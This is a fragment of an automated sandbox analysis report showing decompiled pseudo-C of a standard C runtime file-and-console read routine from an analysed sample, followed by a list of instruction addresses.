                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock
                • String ID:
                • API String ID: 3761839796-0
                • Opcode ID: 0556587309c4ec78ddf18c2651d575d65343c675548cc90777be7f85768d9d39
                • Instruction ID: 97ed45ac5066e8c087459026b5ba92eba88f7f01439dfcbd38624b984c597cf8
                • Opcode Fuzzy Hash: 0556587309c4ec78ddf18c2651d575d65343c675548cc90777be7f85768d9d39
                • Instruction Fuzzy Hash: CD412772508309AFCB10AFA4EC82BDF77E5EF88314F10652DF944BA692DB729541CB51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 97%
                			E00EA289A(signed int __ebx, signed int __ecx, intOrPtr __edx, signed int __esi) {
                				signed char _t250;
                				void* _t252;
                				signed char _t254;
                				signed int _t257;
                				signed int _t258;
                				signed int _t259;
                				intOrPtr _t260;
                				void* _t261;
                				void* _t262;
                				signed int _t263;
                				signed int _t265;
                				long _t266;
                				intOrPtr _t268;
                				signed char _t272;
                				signed char _t273;
                				signed int _t274;
                				signed int _t275;
                				signed char _t276;
                				signed int _t284;
                				intOrPtr _t285;
                				void* _t287;
                				void* _t288;
                				void* _t289;
                				void* _t290;
                				signed int _t294;
                				void* _t295;
                				signed int _t299;
                				intOrPtr _t301;
                				void* _t303;
                				signed char _t304;
                				long _t305;
                				signed char _t306;
                				signed int _t307;
                				signed int _t309;
                				signed int _t320;
                				char _t321;
                				char _t322;
                				signed int _t324;
                				void* _t325;
                				signed char _t326;
                				signed int _t334;
                				intOrPtr _t335;
                				void* _t337;
                				void* _t338;
                				void* _t339;
                				signed int _t341;
                				long _t342;
                				void* _t343;
                				long _t345;
                				void _t353;
                				void _t356;
                				signed int _t362;
                				signed int _t364;
                				intOrPtr _t365;
                				signed int _t366;
                				void* _t367;
                				intOrPtr _t369;
                				signed int _t370;
                				signed int _t375;
                				long _t376;
                				void* _t377;
                				intOrPtr _t378;
                				char _t381;
                				signed int _t383;
                				void* _t384;
                				intOrPtr _t385;
                				signed int _t387;
                				void* _t390;
                				intOrPtr _t391;
                				intOrPtr _t394;
                				char _t395;
                				intOrPtr _t396;
                				intOrPtr _t397;
                				signed int _t398;
                				void* _t399;
                				void* _t400;
                				void* _t401;
                				signed int _t403;
                				void _t405;
                				void* _t406;
                				void* _t407;
                				signed int _t409;
                				signed short* _t412;
                				signed int _t413;
                				void* _t416;
                				char* _t418;
                				long _t419;
                				signed int _t423;
                				intOrPtr _t424;
                				signed int _t425;
                				signed int _t426;
                				signed int _t427;
                				signed char* _t428;
                				int _t429;
                				signed int _t430;
                				void* _t432;
                				void* _t434;
                
                				_t421 = __esi;
                				_t396 = __edx;
                				_t366 = __ecx;
                				_t362 = __ebx;
                				_t250 =  *((intOrPtr*)(__edx + __ebx + 0x24)) +  *((intOrPtr*)(__edx + __ebx + 0x24)) >> 1;
                				 *(_t432 + 0x13) = _t250;
                				_t252 = _t250 - 1;
                				if(_t252 == 0) {
                					_t254 =  !__esi;
                					__eflags = _t254 & 0x00000001;
                					if((_t254 & 0x00000001) == 0) {
                						goto L2;
                					} else {
                						_t421 = __esi >> 1;
                						__eflags = _t421 - 4;
                						if(_t421 < 4) {
                							_t421 = 4;
                						}
                						_t259 = E00EB22C8(_t366, _t396, _t421);
                						 *(_t432 - 0x10) = _t259;
                						_pop(_t367);
                						__eflags = _t259;
                						if(__eflags != 0) {
                							_t260 = L00EB3F56(_t367, __eflags,  *((intOrPtr*)(_t432 + 8)), 0, 0, 1);
                							_t434 = _t434 + 0x10;
                							_t369 =  *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4));
                							 *((intOrPtr*)(_t369 + _t362 + 0x28)) = _t260;
                							_t17 = _t432 - 0x10; // 0xeb2b47
                							_t261 =  *_t17;
                							 *((intOrPtr*)(_t369 + _t362 + 0x2c)) = _t396;
                							_t366 =  *(_t432 - 0xc);
                							goto L14;
                						} else {
                							 *((intOrPtr*)(E00EAF100())) = 0xc;
                							_t257 = E00EAF0CC();
                							 *_t257 = 8;
                							goto L161;
                						}
                					}
                				} else {
                					if(_t252 != 1) {
                						L7:
                						_t261 =  *(_t432 + 0xc);
                						 *(_t432 - 0x10) = _t261;
                						L14:
                						_t397 =  *((intOrPtr*)(0xecf230 + _t366 * 4));
                						_t370 =  *(_t432 - 0xc);
                						 *(_t432 - 0x1c) = _t261;
                						if(( *(_t397 + _t362 + 4) & 0x00000048) != 0) {
                							_t405 =  *((intOrPtr*)(_t397 + _t362 + 5));
                							if(_t405 != 0xa && _t421 != 0) {
                								 *_t261 = _t405;
                								_t406 = _t261 + 1;
                								_t409 = 1;
                								_t421 = _t421 - 1;
                								 *(_t432 - 0x1c) = _t406;
                								 *((char*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 5)) = 0xa;
                								if( *(_t432 + 0x13) != 0) {
                									_t353 =  *((intOrPtr*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 0x25));
                									if(_t353 != 0xa && _t421 != 0) {
                										 *_t406 = _t353;
                										_t407 = _t406 + 1;
                										_t421 = _t421 - 1;
                										 *(_t432 - 0x1c) = _t407;
                										_t409 = 2;
                										 *((char*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 0x25)) = 0xa;
                										if( *(_t432 + 0x13) == 1) {
                											_t356 =  *((intOrPtr*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 0x26));
                											if(_t356 != 0xa && _t421 != 0) {
                												 *_t407 = _t356;
                												_t421 = _t421 - 1;
                												_t409 = 3;
                												_t395 = 0xa;
                												 *(_t432 - 0x1c) = _t407 + 1;
                												 *((char*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 0x26)) = _t395;
                											}
                										}
                									}
                								}
                							}
                						}
                						_t262 = E00EB3924( *((intOrPtr*)(_t432 + 8)));
                						_t263 =  *(_t432 - 0xc);
                						if(_t262 == 0) {
                							L35:
                							_t265 = ReadFile( *( *((intOrPtr*)(0xecf230 + _t263 * 4)) + _t362),  *(_t432 - 0x1c), _t421, _t432 - 0x14, 0);
                							__eflags = _t265;
                							if(_t265 == 0) {
                								L156:
                								_t266 = GetLastError();
                								_t423 = 5;
                								__eflags = _t266 - _t423;
                								if(_t266 != _t423) {
                									__eflags = _t266 - 0x6d;
                									if(_t266 != 0x6d) {
                										goto L30;
                									}
                									_t364 = 0;
                									goto L32;
                								}
                								 *((intOrPtr*)(E00EAF100())) = 9;
                								 *(E00EAF0CC()) = _t423;
                								goto L31;
                							}
                							_t375 =  *(_t432 - 0x14);
                							__eflags = _t375;
                							if(_t375 < 0) {
                								goto L156;
                							}
                							__eflags = _t375 - _t421;
                							if(_t375 > _t421) {
                								goto L156;
                							}
                							goto L38;
                						} else {
                							_t394 =  *((intOrPtr*)(0xecf230 + _t263 * 4));
                							if(( *(_t394 + _t362 + 4) & 0x00000080) == 0) {
                								goto L35;
                							}
                							_t345 = GetConsoleMode( *(_t394 + _t362), _t432 - 0x20);
                							 *(_t432 - 0x20) = _t345;
                							if(_t345 == 0 ||  *(_t432 + 0x13) != 2) {
                								_t263 =  *(_t432 - 0xc);
                								goto L35;
                							} else {
                								if(ReadConsoleW( *( *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4)) + _t362),  *(_t432 - 0x1c), _t421 >> 1, _t432 - 0x14, 0) != 0) {
                									_t375 =  *(_t432 - 0x14) +  *(_t432 - 0x14);
                									 *(_t432 - 0x14) = _t375;
                									L38:
                									_t398 =  *(_t432 - 0xc);
                									_t409 = _t409 + _t375;
                									_t424 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
                									_t272 =  *(_t424 + _t362 + 4);
                									__eflags = _t272;
                									if(_t272 >= 0) {
                										L98:
                										_t172 = _t432 - 0x10; // 0xeb2b47
                										_t268 =  *_t172;
                										L99:
                										_t364 =  *(_t432 - 0x18);
                										L100:
                										if(_t268 !=  *(_t432 + 0xc)) {
                											E00EB2248(_t268);
                										}
                										if(_t364 != 0xfffffffe) {
                											_t409 = _t364;
                										}
                										_t258 = _t409;
                										L162:
                										return _t258;
                									}
                									__eflags =  *(_t432 + 0x13) - 2;
                									if( *(_t432 + 0x13) == 2) {
                										__eflags =  *(_t432 - 0x20);
                										if( *(_t432 - 0x20) == 0) {
                											__eflags = _t375;
                											if(_t375 == 0) {
                												L123:
                												_t273 = _t272 & 0x000000fb;
                												__eflags = _t273;
                												L124:
                												 *(_t424 + _t362 + 4) = _t273;
                												_t194 = _t432 - 0x10; // 0xeb2b47
                												_t274 =  *_t194;
                												_t425 = _t274;
                												 *(_t432 - 0x28) = _t274;
                												_t376 = _t274 + _t409;
                												 *(_t432 - 0x20) = _t376;
                												__eflags = _t274 - _t376;
                												if(_t274 >= _t376) {
                													L155:
                													_t246 = _t432 - 0x10; // 0xeb2b47
                													_t268 =  *_t246;
                													_t409 = _t425 - _t268;
                													goto L99;
                												}
                												_t377 = 0xd;
                												 *((intOrPtr*)(_t432 + 0x10)) = 0x1a;
                												_t412 = _t274;
                												while(1) {
                													_t275 =  *_t412 & 0x0000ffff;
                													__eflags = _t275 -  *((intOrPtr*)(_t432 + 0x10));
                													if(_t275 ==  *((intOrPtr*)(_t432 + 0x10))) {
                														break;
                													}
                													__eflags = _t275 - _t377;
                													if(_t275 == _t377) {
                														__eflags = _t412 -  *(_t432 - 0x20) + 0xfffffffe;
                														if(_t412 >=  *(_t432 - 0x20) + 0xfffffffe) {
                															_t412 =  &(_t412[1]);
                															_t284 = ReadFile( *( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362), _t432 - 8, 2, _t432 - 0x14, 0);
                															__eflags = _t284;
                															if(_t284 != 0) {
                																L136:
                																__eflags =  *(_t432 - 0x14);
                																if( *(_t432 - 0x14) == 0) {
                																	L151:
                																	_t398 =  *(_t432 - 0xc);
                																	_t377 = 0xd;
                																	 *_t425 = _t377;
                																	_t425 = _t425 + 2;
                																	L143:
                																	__eflags = _t412 -  *(_t432 - 0x20);
                																	if(_t412 <  *(_t432 - 0x20)) {
                																		continue;
                																	}
                																	goto L155;
                																}
                																_t398 =  *(_t432 - 0xc);
                																_t285 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
                																__eflags =  *(_t285 + _t362 + 4) & 0x00000048;
                																if(( *(_t285 + _t362 + 4) & 0x00000048) == 0) {
                																	__eflags = _t425 -  *(_t432 - 0x10);
                																	if(__eflags != 0) {
                																		L148:
                																		L00EB3F56(_t377, __eflags,  *((intOrPtr*)(_t432 + 8)), 0xfffffffe, 0xffffffff, 1);
                																		_t398 =  *(_t432 - 0xc);
                																		_t434 = _t434 + 0x10;
                																		_t287 = 0xa;
                																		__eflags =  *(_t432 - 8) - _t287;
                																		if( *(_t432 - 8) == _t287) {
                																			L141:
                																			_push(0xd);
                																			L142:
                																			_pop(_t377);
                																			goto L143;
                																		}
                																		_t377 = 0xd;
                																		 *_t425 = _t377;
                																		L150:
                																		_t425 = _t425 + 2;
                																		goto L143;
                																	}
                																	_t288 = 0xa;
                																	__eflags =  *(_t432 - 8) - _t288;
                																	if(__eflags != 0) {
                																		goto L148;
                																	}
                																	 *_t425 = _t288;
                																	_t425 = _t425 + 2;
                																	goto L141;
                																}
                																_t289 = 0xa;
                																_push(0xd);
                																__eflags =  *(_t432 - 8) - _t289;
                																if( *(_t432 - 8) != _t289) {
                																	_pop(_t290);
                																	 *_t425 = _t290;
                																	_t425 = _t425 + 2;
                																	__eflags = _t425;
                																	 *((char*)( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362 + 5)) =  *(_t432 - 8);
                																	 *((char*)( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362 + 0x25)) =  *((intOrPtr*)(_t432 - 7));
                																	_t381 = 0xa;
                																	 *((char*)( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362 + 0x26)) = _t381;
                																	goto L141;
                																}
                																 *_t425 = _t289;
                																_t425 = _t425 + 2;
                																goto L142;
                															}
                															_t294 = GetLastError();
                															__eflags = _t294;
                															if(_t294 != 0) {
                																goto L151;
                															}
                															goto L136;
                														}
                														_t399 = 0xa;
                														__eflags = _t412[1] - _t399;
                														_t398 =  *(_t432 - 0xc);
                														if(_t412[1] != _t399) {
                															 *_t425 = _t377;
                															L133:
                															_t425 = _t425 + 2;
                															_t412 =  &(_t412[1]);
                															goto L143;
                														}
                														_t295 = 0xa;
                														_t412 =  &(_t412[2]);
                														 *_t425 = _t295;
                														goto L150;
                													}
                													 *_t425 = _t275;
                													goto L133;
                												}
                												_t378 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
                												_t276 =  *(_t378 + _t362 + 4);
                												__eflags = _t276 & 0x00000040;
                												if((_t276 & 0x00000040) != 0) {
                													 *_t425 =  *_t412;
                													_t425 = _t425 + 2;
                													__eflags = _t425;
                												} else {
                													 *(_t378 + _t362 + 4) = _t276 | 0x00000002;
                												}
                												goto L155;
                											}
                											_t190 = _t432 - 0x10; // 0xeb2b47
                											_t400 = 0xa;
                											__eflags =  *((intOrPtr*)( *_t190)) - _t400;
                											_t398 =  *(_t432 - 0xc);
                											if( *((intOrPtr*)( *_t190)) != _t400) {
                												goto L123;
                											}
                											_t273 = _t272 | 0x00000004;
                											goto L124;
                										}
                										_t176 = _t432 - 0x10; // 0xeb2b47
                										_t426 =  *_t176;
                										asm("cdq");
                										_t413 = _t426;
                										_t383 = _t426;
                										_t401 = _t413 + (_t409 - _t398 >> 1) * 2;
                										__eflags = _t413 - _t401;
                										asm("cli");
                										if(__eflags >= 0) {
                											L119:
                											_t189 = _t432 - 0x10; // 0xeb2b47
                											_t268 =  *_t189;
                											_t409 = _t426 - _t268 & 0xfffffffe;
                											goto L99;
                										} else {
                											 *((intOrPtr*)(_t432 + 0x10)) = 0x1a;
                											_t416 = 0xd;
                											while(1) {
                												_t299 =  *_t383 & 0x0000ffff;
                												__eflags = _t299 -  *((intOrPtr*)(_t432 + 0x10));
                												if(_t299 ==  *((intOrPtr*)(_t432 + 0x10))) {
                													break;
                												}
                												__eflags = _t299 - _t416;
                												if(_t299 == _t416) {
                													__eflags = _t383 - _t401 - 2;
                													if(_t383 < _t401 - 2) {
                														_t383 = _t383 + 2;
                														_t303 = 0xa;
                														__eflags =  *_t383 - _t303;
                														if( *_t383 != _t303) {
                															_t303 = 0xd;
                															_t416 = _t303;
                														}
                														 *_t426 = _t303;
                														_t426 = _t426 + 2;
                														__eflags = _t426;
                													}
                												} else {
                													 *_t426 = _t299;
                													_t426 = _t426 + 2;
                													_t383 = _t383 + 2;
                												}
                												__eflags = _t383 - _t401;
                												if(_t383 < _t401) {
                													continue;
                												} else {
                													goto L119;
                												}
                											}
                											_t301 =  *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4));
                											_t185 = _t301 + _t362 + 4;
                											 *_t185 =  *(_t301 + _t362 + 4) | 0x00000002;
                											__eflags =  *_t185;
                											goto L119;
                										}
                									}
                									__eflags = _t375;
                									if(_t375 == 0) {
                										L43:
                										_t304 = _t272 & 0x000000fb;
                										__eflags = _t304;
                										L44:
                										 *(_t424 + _t362 + 4) = _t304;
                										_t95 = _t432 - 0x10; // 0xeb2b47
                										_t305 =  *_t95;
                										_t427 = _t305;
                										 *(_t432 - 0x20) = _t305;
                										_t384 = _t305 + _t409;
                										 *(_t432 - 0x1c) = _t384;
                										__eflags = _t305 - _t384;
                										if(_t305 >= _t384) {
                											L74:
                											_t135 = _t432 - 0x10; // 0xeb2b47
                											_t268 =  *_t135;
                											_t409 = _t427 - _t268;
                											__eflags =  *(_t432 + 0x13) - 1;
                											if( *(_t432 + 0x13) != 1) {
                												goto L99;
                											}
                											__eflags = _t409;
                											if(_t409 == 0) {
                												goto L99;
                											}
                											_t428 = _t427 - 1;
                											_t306 =  *_t428;
                											__eflags = _t306;
                											if(_t306 < 0) {
                												_t307 = _t306 & 0x000000ff;
                												_t403 = 1;
                												__eflags =  *((char*)(_t307 + 0xece408));
                												if( *((char*)(_t307 + 0xece408)) != 0) {
                													L84:
                													_t309 =  *((char*)(( *_t428 & 0x000000ff) + 0xece408));
                													__eflags = _t309;
                													if(_t309 != 0) {
                														__eflags = _t309 + 1 - _t403;
                														if(_t309 + 1 != _t403) {
                															_t385 =  *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4));
                															__eflags =  *(_t385 + _t362 + 4) & 0x00000048;
                															if(__eflags == 0) {
                																asm("cdq");
                																L00EB3F56(_t385, __eflags,  *((intOrPtr*)(_t432 + 8)),  ~_t403,  ~_t403, 1);
                																_t434 = _t434 + 0x10;
                															} else {
                																_t430 =  &(_t428[1]);
                																 *((char*)(_t385 + _t362 + 5)) =  *_t428;
                																_t320 =  *(_t432 - 0xc);
                																__eflags = _t403 - 2;
                																if(_t403 >= 2) {
                																	_t322 =  *_t430;
                																	_t430 = _t430 + 1;
                																	__eflags = _t430;
                																	 *((char*)( *((intOrPtr*)(0xecf230 + _t320 * 4)) + _t362 + 0x25)) = _t322;
                																	_t320 =  *(_t432 - 0xc);
                																}
                																__eflags = _t403 - 3;
                																if(_t403 == 3) {
                																	_t321 =  *_t430;
                																	_t430 = _t430 + 1;
                																	__eflags = _t430;
                																	 *((char*)( *((intOrPtr*)(0xecf230 + _t320 * 4)) + _t362 + 0x26)) = _t321;
                																}
                																_t428 = _t430 - _t403;
                															}
                														} else {
                															_t428 =  &(_t428[_t403]);
                														}
                														L95:
                														_t163 = _t432 - 0x10; // 0xeb2b47
                														_t418 =  *_t163;
                														_t429 = _t428 - _t418;
                														_t409 = MultiByteToWideChar(0xfde9, 0, _t418, _t429,  *(_t432 + 0xc),  *(_t432 - 0x28) >> 1);
                														__eflags = _t409;
                														if(_t409 == 0) {
                															goto L29;
                														}
                														__eflags = _t409 - _t429;
                														_t387 = 0 | _t409 != _t429;
                														_t409 = _t409 + _t409;
                														__eflags = _t409;
                														 *( *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4)) + _t362 + 0x30) = _t387;
                														asm("sbb [eax], dh");
                														goto L98;
                													}
                													 *((intOrPtr*)(E00EAF100())) = 0x2a;
                													L31:
                													_t364 = _t362 | 0xffffffff;
                													L32:
                													_t75 = _t432 - 0x10; // 0xeb2b47
                													_t268 =  *_t75;
                													goto L100;
                												}
                												_t138 = _t432 - 0x10; // 0xeb2b47
                												_t365 =  *_t138;
                												while(1) {
                													__eflags = _t403 - 4;
                													if(_t403 > 4) {
                														break;
                													}
                													__eflags = _t428 - _t365;
                													if(_t428 < _t365) {
                														break;
                													}
                													_t428 = _t428 - 1;
                													_t403 = _t403 + 1;
                													_t324 =  *_t428 & 0x000000ff;
                													__eflags =  *((char*)(_t324 + 0xece408));
                													if( *((char*)(_t324 + 0xece408)) == 0) {
                														continue;
                													}
                													break;
                												}
                												_t362 =  *(_t432 - 0x24);
                												goto L84;
                											}
                											_t428 =  &(_t428[1]);
                											goto L95;
                										}
                										_t390 = 0xd;
                										_t419 = _t305;
                										while(1) {
                											_t325 =  *_t419;
                											__eflags = _t325 - 0x1a;
                											if(_t325 == 0x1a) {
                												break;
                											}
                											__eflags = _t325 - _t390;
                											if(_t325 == _t390) {
                												__eflags = _t419 -  *(_t432 - 0x1c) - 1;
                												if(_t419 >=  *(_t432 - 0x1c) - 1) {
                													_t419 = _t419 + 1;
                													_t334 = ReadFile( *( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362), _t432 - 1, 1, _t432 - 0x14, 0);
                													__eflags = _t334;
                													if(_t334 != 0) {
                														L55:
                														__eflags =  *(_t432 - 0x14);
                														if( *(_t432 - 0x14) == 0) {
                															L70:
                															_t398 =  *(_t432 - 0xc);
                															_t390 = 0xd;
                															 *_t427 = _t390;
                															_t427 = _t427 + 1;
                															L65:
                															__eflags = _t419 -  *(_t432 - 0x1c);
                															if(_t419 <  *(_t432 - 0x1c)) {
                																continue;
                															}
                															goto L74;
                														}
                														_t398 =  *(_t432 - 0xc);
                														_t335 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
                														__eflags =  *(_t335 + _t362 + 4) & 0x00000048;
                														if(( *(_t335 + _t362 + 4) & 0x00000048) == 0) {
                															_t120 = _t432 - 0x10; // 0xeb2b47
                															__eflags = _t427 -  *_t120;
                															if(__eflags != 0) {
                																L67:
                																L00EB3F56(_t390, __eflags,  *((intOrPtr*)(_t432 + 8)), 0xffffffff, 0xffffffff, 1);
                																_t398 =  *(_t432 - 0xc);
                																_t434 = _t434 + 0x10;
                																_t337 = 0xa;
                																__eflags =  *(_t432 - 1) - _t337;
                																if( *(_t432 - 1) == _t337) {
                																	L63:
                																	_push(0xd);
                																	L64:
                																	_pop(_t390);
                																	goto L65;
                																}
                																_t390 = 0xd;
                																 *_t427 = _t390;
                																L69:
                																_t427 = _t427 + 1;
                																goto L65;
                															}
                															_t338 = 0xa;
                															__eflags =  *(_t432 - 1) - _t338;
                															if(__eflags != 0) {
                																goto L67;
                															}
                															 *_t427 = _t338;
                															_t427 = _t427 + 1;
                															__eflags = _t427;
                															goto L63;
                														}
                														_t339 = 0xa;
                														_push(0xd);
                														__eflags =  *(_t432 - 1) - _t339;
                														if( *(_t432 - 1) != _t339) {
                															 *_t427 = 0xd;
                															_t427 = _t427 + 1;
                															 *((char*)( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362 + 5)) =  *(_t432 - 1);
                														} else {
                															 *_t427 = _t339;
                															_t427 = _t427 + 1;
                														}
                														goto L64;
                													}
                													_t341 = GetLastError();
                													__eflags = _t341;
                													if(_t341 != 0) {
                														goto L70;
                													}
                													goto L55;
                												}
                												_t342 = _t419 + 1;
                												__eflags =  *_t342 - 0xa;
                												if( *_t342 != 0xa) {
                													 *_t427 = _t390;
                													_t419 = _t342;
                													_t427 = _t427 + 1;
                													goto L65;
                												}
                												_t343 = 0xa;
                												_t419 = _t419 + 2;
                												 *_t427 = _t343;
                												goto L69;
                											}
                											 *_t427 = _t325;
                											_t427 = _t427 + 1;
                											_t419 = _t419 + 1;
                											goto L65;
                										}
                										_t391 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
                										_t326 =  *(_t391 + _t362 + 4);
                										__eflags = _t326 & 0x00000040;
                										if((_t326 & 0x00000040) != 0) {
                											 *_t427 =  *_t419;
                											_t427 = _t427 + 1;
                											__eflags = _t427;
                										} else {
                											 *(_t391 + _t362 + 4) = _t326 | 0x00000002;
                										}
                										goto L74;
                									}
                									_t92 = _t432 - 0x10; // 0xeb2b47
                									__eflags =  *((char*)( *_t92)) - 0xa;
                									if( *((char*)( *_t92)) != 0xa) {
                										goto L43;
                									}
                									_t304 = _t272 | 0x00000004;
                									goto L44;
                								}
                								L29:
                								_t266 = GetLastError();
                								L30:
                								E00EAF0DF(_t266);
                								goto L31;
                							}
                						}
                					}
                					if(( !__esi & 0x00000001) == 0) {
                						L2:
                						 *(E00EAF0CC()) =  *_t255 & _t409;
                						 *((intOrPtr*)(E00EAF100())) = 0x16;
                						_t257 = E00EAEB1E();
                						L161:
                						_t258 = _t257 | 0xffffffff;
                						__eflags = _t258;
                						goto L162;
                					} else {
                						_t421 = __esi & 0xfffffffe;
                						goto L7;
                					}
                				}
                			}

                0x00eafebb
                0x00eafebd
                0x00eafec1
                0x00eafecb
                0x00eafecc
                0x00eafecf
                0x00eafecf
                0x00eafede
                0x00eafeec
                0x00eafef7
                0x00eafef8
                0x00000000
                0x00eafef8
                0x00eafec3
                0x00eafec6
                0x00000000
                0x00eafec6
                0x00eafe8f
                0x00eafe95
                0x00eafe97
                0x00000000
                0x00000000
                0x00000000
                0x00eafe97
                0x00eafe46
                0x00eafe47
                0x00eafe4b
                0x00eafe4e
                0x00eafe5e
                0x00eafe61
                0x00eafe61
                0x00eafe64
                0x00000000
                0x00eafe64
                0x00eafe52
                0x00eafe53
                0x00eafe56
                0x00000000
                0x00eafe56
                0x00eafe35
                0x00000000
                0x00eafe35
                0x00eaff56
                0x00eaff5d
                0x00eaff61
                0x00eaff63
                0x00eaff70
                0x00eaff73
                0x00eaff73
                0x00eaff65
                0x00eaff67
                0x00eaff67
                0x00000000
                0x00eaff63
                0x00eafde9
                0x00eafdee
                0x00eafdef
                0x00eafdf2
                0x00eafdf5
                0x00000000
                0x00000000
                0x00eafdf7
                0x00000000
                0x00eafdf7
                0x00eafd6c
                0x00eafd6c
                0x00eafd71
                0x00eafd72
                0x00eafd76
                0x00eafd7a
                0x00eafd7d
                0x00eafd7e
                0x00eafd7f
                0x00eafdd6
                0x00eafdd6
                0x00eafdd6
                0x00eafddd
                0x00000000
                0x00eafd81
                0x00eafd83
                0x00eafd8a
                0x00eafd8b
                0x00eafd8b
                0x00eafd8e
                0x00eafd92
                0x00000000
                0x00000000
                0x00eafd94
                0x00eafd97
                0x00eafda7
                0x00eafda9
                0x00eafdab
                0x00eafdb0
                0x00eafdb1
                0x00eafdb4
                0x00eafdb8
                0x00eafdba
                0x00eafdba
                0x00eafdbb
                0x00eafdbe
                0x00eafdbe
                0x00eafdbe
                0x00eafd99
                0x00eafd99
                0x00eafd9c
                0x00eafd9f
                0x00eafd9f
                0x00eafdc1
                0x00eafdc3
                0x00000000
                0x00eafdc5
                0x00000000
                0x00eafdc5
                0x00eafdc3
                0x00eafdca
                0x00eafdd1
                0x00eafdd1
                0x00eafdd1
                0x00000000
                0x00eafdd1
                0x00eafd7f
                0x00eafaf9
                0x00eafafb
                0x00eafb09
                0x00eafb09
                0x00eafb09
                0x00eafb0b
                0x00eafb0b
                0x00eafb0f
                0x00eafb0f
                0x00eafb12
                0x00eafb14
                0x00eafb17
                0x00eafb1a
                0x00eafb1d
                0x00eafb1f
                0x00eafc33
                0x00eafc33
                0x00eafc33
                0x00eafc38
                0x00eafc3a
                0x00eafc3e
                0x00000000
                0x00000000
                0x00eafc44
                0x00eafc46
                0x00000000
                0x00000000
                0x00eafc4c
                0x00eafc4d
                0x00eafc4f
                0x00eafc51
                0x00eafc59
                0x00eafc5e
                0x00eafc5f
                0x00eafc66
                0x00eafc85
                0x00eafc88
                0x00eafc8f
                0x00eafc91
                0x00eafca4
                0x00eafca6
                0x00eafcaf
                0x00eafcb6
                0x00eafcbb
                0x00eafcfa
                0x00eafd00
                0x00eafd05
                0x00eafcbd
                0x00eafcbf
                0x00eafcc0
                0x00eafcc4
                0x00eafcc7
                0x00eafcca
                0x00eafcd3
                0x00eafcd5
                0x00eafcd5
                0x00eafcd6
                0x00eafcda
                0x00eafcda
                0x00eafcdd
                0x00eafce0
                0x00eafce9
                0x00eafceb
                0x00eafceb
                0x00eafcec
                0x00eafcec
                0x00eafcf0
                0x00eafcf0
                0x00eafca8
                0x00eafca8
                0x00eafca8
                0x00eafd08
                0x00eafd0b
                0x00eafd0b
                0x00eafd0e
                0x00eafd25
                0x00eafd27
                0x00eafd29
                0x00000000
                0x00000000
                0x00eafd34
                0x00eafd36
                0x00eafd39
                0x00eafd39
                0x00eafd42
                0x00eafd44
                0x00000000
                0x00eafd44
                0x00eafc98
                0x00eafa89
                0x00eafa89
                0x00eafa8c
                0x00eafa8c
                0x00eafa8c
                0x00000000
                0x00eafa8c
                0x00eafc68
                0x00eafc68
                0x00eafc6b
                0x00eafc6b
                0x00eafc6e
                0x00000000
                0x00000000
                0x00eafc70
                0x00eafc72
                0x00000000
                0x00000000
                0x00eafc74
                0x00eafc75
                0x00eafc76
                0x00eafc79
                0x00eafc80
                0x00000000
                0x00000000
                0x00000000
                0x00eafc80
                0x00eafc82
                0x00000000
                0x00eafc82
                0x00eafc53
                0x00000000
                0x00eafc53
                0x00eafb27
                0x00eafb28
                0x00eafb2a
                0x00eafb2a
                0x00eafb2c
                0x00eafb2e
                0x00000000
                0x00000000
                0x00eafb34
                0x00eafb36
                0x00eafb45
                0x00eafb47
                0x00eafb6a
                0x00eafb7c
                0x00eafb82
                0x00eafb84
                0x00eafb90
                0x00eafb90
                0x00eafb94
                0x00eafc0c
                0x00eafc0c
                0x00eafc11
                0x00eafc12
                0x00eafc14
                0x00eafbdd
                0x00eafbdd
                0x00eafbe0
                0x00000000
                0x00000000
                0x00000000
                0x00eafbe6
                0x00eafb96
                0x00eafb99
                0x00eafba0
                0x00eafba5
                0x00eafbca
                0x00eafbca
                0x00eafbcd
                0x00eafbe8
                0x00eafbf1
                0x00eafbf6
                0x00eafbf9
                0x00eafbfe
                0x00eafbff
                0x00eafc02
                0x00eafbda
                0x00eafbda
                0x00eafbdc
                0x00eafbdc
                0x00000000
                0x00eafbdc
                0x00eafc06
                0x00eafc07
                0x00eafc09
                0x00eafc09
                0x00000000
                0x00eafc09
                0x00eafbd1
                0x00eafbd2
                0x00eafbd5
                0x00000000
                0x00000000
                0x00eafbd7
                0x00eafbd9
                0x00eafbd9
                0x00000000
                0x00eafbd9
                0x00eafba9
                0x00eafbaa
                0x00eafbac
                0x00eafbaf
                0x00eafbb6
                0x00eafbb9
                0x00eafbc4
                0x00eafbb1
                0x00eafbb1
                0x00eafbb3
                0x00eafbb3
                0x00000000
                0x00eafbaf
                0x00eafb86
                0x00eafb8c
                0x00eafb8e
                0x00000000
                0x00000000
                0x00000000
                0x00eafb8e
                0x00eafb49
                0x00eafb4c
                0x00eafb4f
                0x00eafb5e
                0x00eafb60
                0x00eafb62
                0x00000000
                0x00eafb62
                0x00eafb53
                0x00eafb54
                0x00eafb57
                0x00000000
                0x00eafb57
                0x00eafb38
                0x00eafb3a
                0x00eafb3b
                0x00000000
                0x00eafb3b
                0x00eafc17
